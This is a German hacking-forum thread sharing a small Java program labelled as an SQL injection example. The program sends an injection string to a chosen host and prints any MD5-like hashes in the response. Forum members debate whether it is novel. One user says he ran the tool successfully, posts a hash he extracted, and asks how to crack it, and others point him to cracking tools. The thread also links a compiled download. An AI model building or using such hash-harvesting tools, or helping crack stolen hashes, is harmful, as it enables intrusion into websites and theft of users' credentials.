Es hat jemand geschafft einen Exploit zu programmieren unter Java :KA



/*
SQL Injection Example
www.bifrostworld.org
*/

import java.net.*;
import java.io.*;
import java.util.regex.*;
import java.util.*;
import java.io.InputStream;

class SQL {
public static void main(String[] args){


//Host URl without http://
String host="";
//Injection goes here
String inject = "";
String victim = "http://" + host + inject;

try{
URL url = new URL(victim);
URLConnection connect = url.openConnection();
InputStream in = connect.getInputStream();
Scanner s = new Scanner(in);

while(s.hasNext()){
Pattern pat = Pattern.compile("([a-f0-9]{32})");
Matcher match = pat.matcher(s.next());

if(match.find()){
System.out.println(match.group());
}else{
System.out.println("No hash found");
}
}
}catch(Exception e){
System.out.println(e);
}
}
}


Fertig compilt :
http://ul.to/w4aghk

Screenshot :
http://saved.im/mtexoteyagjt/screenshot.png

Und was ist daran nun so besonders? o0

Ja und? Java hat Sockets, warum soll man da keine Exploits schreiben können?

Und warum gibt es sowas kaum?

Jop wäre doch besserer wenn es Exploits mit GUIs geäbe...

Es geht aber darum, dass es in Java geschrieben wurde. Außerdem ist es lediglich ein Beispiel wie sowas aussehen kann. Glaube kaum, dass sich hier einer jemals wirklich mit Java auseinander gesetzt hat, sondern einfach nur irgendwas daher redet.

Ich Frage mich auch gerade was daran so besonders sein solle.

Jop wäre doch besserer wenn es Exploits mit GUIs geäbe...

Ich find ohne GUI siehts besser aus.

Und was das besondere ist:

Ich denk einfach, dass es wenig Java Exploits gibt, und es daher etwas besonderes ist.

Ein Exploit in Ook oder Brainfuck wäre cool, aber an java finde ich nichts besonderes ...

JAVA != SOFORT GUI

könnt auch exploits mit gui in vb,perl,php,und whatever coden, eben alles was bibliotheken für guis bereitstellt :P

exploits sind im eigentlichen sinne, nur funktionsbeweiße zur ausnutzung einer Sicherheitslücke,.

Und da nimmt man eben eher Schnelle und verbreitete Script Sprachen wie z.B Perl oder PHP.

Wieso sollte jemand eine extra einen GUI für einen Proof of Concept bereitstellen.

Jop wäre doch besserer wenn es Exploits mit GUIs geäbe...

Und wieso?
Da hier niemand Exploits zum Hacken von zufällig ausgewählten Seiten benutzt, werden diese Exploits sicher nicht häufig genug angewendet als dass sich eine grafische Benutzeroberfläche lohnen würde, ODER?

@Hassia
Ich habe mich mit Java auseinandergesetzt und alle hier anzuschuldigen sich nie mit Java beschäftigt zu haben finde ich ziemlich frech.
Mal ganz davon abgesehen bleibt fraglich in wie weit du dich mit Java beschäftigt hast, wenn du es für so unglaublich toll hällst, mit Java eine Webanfrage durchzuführen und via RegEx alle MD5-ähnlichen Strings anzuzeigen.
(MD5-ähnlich = alle 32 Zeichen langen Strings, die nur aus diesem Zeichensatz besehen: "0123456789abcdef")

PS: das unten abgebildete Programm kann nicht mit dem Sourcecode übereinstimmen, da in diesem keine grafische Oberfläche erstellt wird.

So, ich hab den Thread heute morgen entdeckt. Nun spiele ich mal Leichenschänder und grab das gute Stück mal aus.

Ich hab das Tool getestet und gesehen, dass es noch voll funktionsfähig ist.

Nun meine Frage, was kann ich jetzt damit anfangen wenn ich einen Hash hab ?

Ich hab versucht so einen Hash auf Hashkiller.com zu entschlüssel, doch ohne erfolg. Wäre über eine Hilfe sehr erfreut.



gruß K3nny

use sum leet md5craxxor, hashkill0r iz not leet enuf.

Okay danke @Kazuya.

Ich hab hier mal den Hash "6b740e76e51bf47d59a629f5ef2fa21f"

ein andere läuft atm noch. Mal gucken ob was raus kommt.

Ist dass aber überhaupt ein MD5 Hash ?? oder ist ein ein SHA1

http://free-hack.com/hash-cracking/
Stickys lesen.

Ein sha1 hash hat 40 zeichen.
Aber es könnte sein das es erst mit sha1 und anschließend mit md5 verschlüsselt wurde wer weiß das schon xD


md5(md5(sha1(sha1(sha1("pw"))))); :D

md5(md5(sha1(sha1(sha1("pw")))));
Ohje, da wollen wir mal hoffen, dass keiner diesen Algorithmus anwendet ;)

Stichwort: Kollision.